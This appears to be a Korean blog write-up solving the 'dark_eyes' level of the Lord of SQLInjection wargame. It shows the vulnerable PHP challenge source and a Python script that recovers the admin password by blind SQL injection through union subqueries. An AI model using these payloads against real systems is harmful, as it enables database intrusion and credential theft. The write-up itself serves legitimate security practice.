[ LOS ] Lord of SQLInjection 22번 풀이(dark_eyes)

sangjun

·

2022. 1. 12. 12:46

반응형

 

문제소스

query : select id from prob_dark_eyes where id='admin' and pw=''

<?php
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
  if(preg_match('/col|if|case|when|sleep|benchmark/i', $_GET[pw])) exit("HeHe");
  $query = "select id from prob_dark_eyes where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(mysqli_error($db)) exit();
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  
  $_GET[pw] = addslashes($_GET[pw]);
  $query = "select pw from prob_dark_eyes where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("dark_eyes");
  highlight_file(__FILE__);
?>

문제 분석 및 페이로드

1. union blind sqli

2. 참과 거짓만 구별하면 되니 union을 통해 구별한다 union 사용시 무조건 ()로 괄호로 묶어줘야 한다

3. 이유는 모르겠지만 id='admin' and 를 안 붙여주면 잘 안됐다 왜지?

#참이면 Hello admin을 출력한다.
import requests
import string
from pwn import *
URL="https://los.rubiya.kr/chall/dark_eyes_4e0c557b6751028de2e64d4d0020e02c.php"
brute=string.digits+string.ascii_letters+string.punctuation
cookies={"PHPSESSID":"kogf8srvhks2phbp9kdndnk5ar"}
passwd=""
print(brute)
length=-1
#find passwd Length
for i in range(100):
    query=f"""?pw=' or id='admin' and (select 1 union select length(pw)={i})%23"""  #그냥 leng(pw)해주면 guest pw가 4라서 이상하게 나온다.
    response=requests.get(URL+query,cookies=cookies)
    if "query" in response.text:
        length=i
        break

print(f"pass length is {length}")
#find passwd
for i in range(1,length+1):
    for ch in brute:
        query=f"""?pw=' or id='admin' and (select 1 union select ord(mid(pw,{i},1))={ord(ch)})%23"""
        response=requests.get(URL+query,cookies=cookies)
        print(query)
        if "query" in response.text:
            passwd+=ch
            log.critical(f"{ch}")
            #pause()

            break

print(f"passwd is {passwd}")
반응형

2개의 댓글